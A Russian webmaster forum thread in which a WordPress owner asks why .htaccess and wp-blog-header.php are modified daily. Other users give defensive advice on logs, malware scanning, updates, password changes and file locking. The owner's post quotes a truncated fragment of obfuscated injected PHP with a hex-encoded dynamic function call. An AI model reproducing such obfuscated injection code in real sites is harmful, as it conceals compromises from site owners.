- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
доброго дня всем
имеется сайт на вордпрессе
и каждый день каким то магическим образом файл .htaccess и файл wp-blog-header.php редактируется сам
в нем появляется куча ироглифов каких то и непонятных команд
я так понимаю что это вирус какой то
можно ли как то запретить редактирование данных файлов? права 444 устанавлива - не помогает
или может как то кардинально по-другому можно решить данную проблему? спасибо ))
---------- Добавлено 12.06.2017 в 21:33 ----------
содержание файла вот такого плана
//header('Content-Type:text/html; charset=utf-8');
$O_0OO__0O0='J6Pn2HmH0e568SXnR6KRkmP5tQbh7KEW';
$O_O_OO000_='dribble11207';
$O_O_000_OO=1346;
$O_0O0OO_0_='D/B/C_E.asp';
$O__0OO00O_=700;
$OO__OO_000=1;
$O_O0OO_00_=array("endotheca","eventognath","floodage","mashal","pauperdom","millionary","exteriorness","coadjacent","holomorph","conspiratorial","agaces","eutropous","hemophagocytosis","encephalopsychesis","desertism","herpetological","craniorhachischisis","monopolism","consultee","archimorphic","anaesthesiant","huntswoman","lipogrammatic","heliotypy","desubstantiate","brachydomal","markmoot");;
$O0_O0O__O0='';
$O_0_O0_0OO='T3';["\x4f\x4f\x4f\x5f\x30\x4f\x5f\x30\x30\x5f"]();?>
Штоле сегодня День взломщика? Что ни тема, так внедрение кода. Вас не должно волновать, как "запретить редактирование". Вас должно волновать, как закрыть дыру на сайте.
Анализировать error- и access-логи, искать, каким образом меняются файлы.
Проверить сайт айболитом.
Обновить CMS и плагины.
Вас должно волновать, как закрыть дыру на сайте.
В свете последнего спама, наверное, пора спрашивать не про дыры и логи, а не "подтверждал" ли вопрошающий свой домен не так давно? :)
Если прям топорно, но запретить на верняк, то по SSH снимите атрибут записи на файл с помощью команды:
В папке с сайтом.
Даже рут больше не сможет его менять. Если нужно поменять, выполняте ту же команду только с атрибутом -i
Запретить файлы для редактирования, обновить двиг и плагины, сменить пароли. Если лежит где-то шел, то тут уже лучше обратиться к тем кто чистит от вирусов.
можно ли как то запретить редактирование данных файлов?
Нужно устранять причины (дыры), а не лечить последствия.
Процентов на 95 - дыры и прочие проблемы движка или даже скорее - плагинов.
Но есть маленький еще шанс, что это хостинг кривой. Раз в несколько лет были похожие проблемы. Переехал.
плагины все обновил, движок тоже. пароли тоже все сменил
проблема осталась. ((